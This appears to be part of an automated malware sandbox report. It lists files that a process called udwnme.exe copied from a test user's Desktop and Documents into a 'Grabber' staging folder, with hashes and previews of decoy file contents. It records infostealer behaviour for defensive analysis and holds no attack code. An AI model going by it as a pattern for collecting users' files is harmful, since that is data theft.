                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.514693737970008
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\KATAXZVCPS\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
